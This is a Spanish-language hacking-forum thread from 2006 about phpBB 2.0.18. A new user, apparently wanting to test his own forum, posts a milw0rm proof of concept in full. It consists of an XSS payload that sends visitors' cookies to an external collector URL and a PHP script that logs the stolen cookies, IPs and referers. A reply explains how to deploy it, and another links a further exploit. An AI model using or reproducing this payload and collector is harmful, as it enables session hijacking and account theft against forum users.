elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 02:10  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Xploit phpBB 2.018
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Xploit phpBB 2.018  (Leído 2,066 veces)
Talenito

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Xploit phpBB 2.018
« en: 3 Julio 2006, 02:13 »

Hola soy nuevo, me he pasado dias por aqui leyendo y aprendiendo un poco, trato de no molestar  :rolleyes:

Pero estoy instalando un forito phpBB2 por ahi y me interesa la seguiridad asi que busco xploits o formas de hackarlo para ver que tan vulnerables son
Encontre por ahi este xploit para la version  phpBB2 2.018
que es la version que quiero instalar, pero ni idea si sirve y como se hace funcionar, aun no aprendo bien lo de compilar y todo lo demas, pero consulto a ustedes que saben mas, si este exploit sirve, si alguien lo ha probado  y como se haria funcionar

Código:
/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
-- 'the html is on exploit'

original exploit by:  (cXIb8O3) - 12/16/2005
proof of concept by: jet
-- http://jet.carbon-4.net/

develop a pure, lucid mind, not
depending upon sound, flavor,
touch, odor, or any quality.
- the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:epresionje(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

c.php:

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>

# milw0rm.com [2005-12-21]
En línea
19.5

Desconectado Desconectado

Mensajes: 67


Ver Perfil
Re: Xploit phpBB 2.018
« Respuesta #1 en: 3 Julio 2006, 03:30 »

Aver... esa versión sufre de ataques XSS.
Ahora para que el exploit (no xploit) funcione debes postear ese mensaje como cualquier otro. Entonces cuando alguien visite tu post, el visitante será redirigo a tu sitio donde alojaste el contenido php para almacenar la cookie. Pero también puede insertar otro código no solamente ese. Basicamente es eso.

Te recomiendo que leas mas sobre ataques XSS y sobre el robo de cookies por que cuando recibas alguna te encontrarás en un aprieto :rolleyes:

PD: Trata de leer antes de preguntar por que es fome cuando en la vida te dan las cosas en bandeja de plata.

Empieza por aca.
En línea
DarkJose

Desconectado Desconectado

Mensajes: 101


Ver Perfil
Re: Xploit phpBB 2.018
« Respuesta #2 en: 4 Julio 2006, 06:17 »

aqui hay otro exploit para la versio de phpbb que tu diceS:

http://www.milw0rm.com/exploits/1382

En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines